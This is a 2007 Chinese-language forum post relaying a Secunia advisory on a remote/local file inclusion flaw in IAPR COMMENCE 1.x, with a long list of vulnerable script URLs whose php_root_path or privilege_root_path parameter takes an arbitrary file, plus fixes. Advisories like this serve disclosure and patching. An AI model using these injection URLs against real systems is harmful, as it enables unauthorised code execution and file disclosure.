Board logo

标题: IAPR COMMENCE包含文件时的漏洞 [打印本页]

作者: pioneer     时间: 2007-11-28 09:53    标题: IAPR COMMENCE包含文件时的漏洞

来源

secunia.com

软件名

IAPR COMMENCE 1.x

描述

这可恶意危害有漏洞的系统
在多种脚本下输入的"php_root_path"和"privilege_root_path"参数在用户包含文件前没有被准确过滤,这可从本地和外部资源中包含任意文件

例子:
http://[host]/Commence/includes/db_connect.php?php_root_path=[file]
http://[host]/Commence/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/includes/main_fns.php?php_root_path=[file]
http://[host]/Commence/includes/output_fns.php?php_root_path=[file]
http://[host]/Commence/includes/user_authen_fns.php?php_root_path=[file]
http://[host]/Commence/admin/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/admin/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase1.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase2.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase3.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?php_root_path=[file]
http://[host]/Commence/admin/phase/phase4.php?privilege_root_path=[file]
http://[host]/Commence/admin/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/page.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]
http://[host]/Commence/reviewer/includes/include_all_fns.php?php_root_path=[file]
http://[host]/Commence/reviewer/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/includes/page_includes/pagebase.php?php_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase1.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase1.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase2.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase2.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase3.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase3.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phase4.php?php_root_path=[file]   
http://[host]/Commence/reviewer/phase/phase4.php?privilege_root_path=[file]  
http://[host]/Commence/reviewer/phase/phasebase.php?php_root_path=[file]
http://[host]/Commence/user/phase/include_all_phase.php?php_root_path=[file]
http://[host]/Commence/user/phase/phase1.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phase2.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phase3.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phase4.php?php_root_path=[file]   
http://[host]/Commence/user/phase/phasebase.php?php_root_path=[file]

成功利用需要"register_globals"可用
该漏洞在version 1.3中已经确认,其它版本可能也受到影响

解决方案

编辑源代码确保充分过滤
设置"register_globals"为"Off"

[ Last edited by pioneer on 2007-11-28 at 14:17 ]




欢迎光临 微点交流论坛 (http://bbs.micropoint.com.cn/) bbs.micropoint.com.cn